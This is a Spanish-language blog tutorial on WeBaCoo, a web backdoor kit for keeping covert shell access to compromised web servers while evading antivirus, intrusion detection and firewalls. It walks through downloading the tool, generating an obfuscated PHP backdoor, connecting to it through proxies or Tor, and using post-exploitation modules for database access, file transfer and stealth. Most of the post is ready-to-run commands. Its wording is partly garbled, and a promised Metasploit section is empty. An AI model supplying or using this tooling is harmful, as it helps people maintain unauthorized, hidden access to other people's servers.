WeBaCoo - Web Backdoor Cookie

WeBaCoo (cookie Web Backdoor) es un backdoor web script-kit, cuyo objetivo es el de proporcionar un terminal de sigilo,como conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación de correos para mantener el acceso a un servidor web comprometida.

Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, firewalls y servidores de seguridad de aplicaciones, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido.El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

El guión-kit tiene dos modos de funcionamiento principales: Generación y "Terminal". Usando el modo de generación, el usuario puede crear el código de la  puerta trasera que contiene las cargas útiles de PHP. Por otro lado, en el modo "terminal" el cliente puede conectarse al servidor por donde se ha comprometido el backdoor inyectando código PHP. Con el fin de establecer la conexion remota "pseudo"- shell, el usuario debe proporcionar la ruta de acceso del servidor URL que contiene el código PHP insertado.


 A continuacion vamos a usar el WeBaCoo en Backtrack5R3.

WeBaCoo - Backtrack5R3

 La instalacion creo que no sera ningun problema...=)

~# git clone git://github.com/anestisb/WeBaCoo.git
~# wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
~#./webacoo.pl -h

Deben tener en cuenta que van a existir dos tipos de comandos.

1 .-  Comandos por parte de WeBaCoo.
2 .-  Comandos por parte del servidor. 

Comandos por parte de WeBaCoo

1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:

• ./webacoo.pl -g -o backdoor.php

2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":

• ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:

• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:

• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:

• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:

• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:

• ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt  

Comandos por parte del servidor

 1) MySQL-CLI: MySQL Command Line Module:

• mysql-cli <IP(:port)> <user> <pass>    

2) PSQL-CLI: Postgres Command Line Module:

• psql-cli <IP(:port)> <db> <user> <pass> 

3) Upload: File Upload Module:

• upload <local_file> <remote_dir>     

4) Download: File Download Module:

• download <remote_file>                  

5) Stealth: Enhance Stealth Module

• stealth <webroot_dir>                

 

Creo que con todos estos comandos ya es suficiente para hacer una pequeña prueba....=)..En esta ocasión voy a utilizar la herramienta Metasploit que ya hemos observado en el post anterior...=)

 Mestasploit  y WeBaCoo en Backtrack5R3

Ahora si creo que ya llegamos al final del post, espero que haya sido entendible y util para ustedes..=)
si tienen alguna duda oh hay algun error en los comandos....No se preocupen los comandos estan en la carpeta WeBaCoo ...=) exactamente el el archivo README....Bueno sin mas que decir me despido y sera hasta la próxima....Nos vemos.....=D